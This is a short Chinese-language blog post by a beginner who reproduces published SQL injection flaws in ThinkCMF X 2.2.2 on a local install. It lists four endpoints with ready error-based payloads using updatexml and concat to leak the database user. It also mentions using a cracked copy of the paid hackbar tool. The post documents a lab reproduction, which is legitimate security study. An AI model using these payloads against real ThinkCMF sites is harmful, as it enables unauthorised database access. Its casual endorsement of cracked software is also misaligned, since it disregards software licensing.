前言
对网络安全恋恋不忘,于是周末又折腾了一遍。作为初学者,挖洞是不敢想的,只能找别人写过的漏洞复现下。特此记录。
漏洞说明
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本。
存在多个漏洞。这里复现了全部。
工具
hackbar
谷歌浏览器
火狐浏览器
xdebug
复现过程
-
构建环境。
下载地址如下:
https://github.com/thinkcmf/cmfx/releases
安装后如下图。
安装hackbar
这里最主要的工具是它。该工具最新版需要收费。建议安装低版本或者使用破解的。
这里我选择了破解。
破解思路:
- 漏洞1
http://127.0.0.1/cmfx/index.php?g=portal&m=article&a=edit_post
POST: post[id][0]=bind&post[id][1]=2 and updatexml(1, concat(0x7e,user(),0x7e),1)-- -
前台文章编辑处存在漏洞。构造下面的请求即可。
- 漏洞2
后台管理那里,幻灯片的删除存在漏洞。
http://127.0.0.1/cmfx/index.php?g=Admin&m=slide&a=delete
POST: ids[]=1&ids[]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)
- 漏洞3
导航编辑
http://127.0.0.1/cmfx/index.php?g=Admin&m=nav&a=edit_post
POST: parentid=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
- 漏洞4
评论审核那里
http://127.0.0.1/cmfx/index.php?g=Comment&m=commentadmin&a=check&check=1
POST: ids[]=1&ids[]=2 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
- 相关文章
https://blog.csdn.net/weixin_33924770/article/details/86031193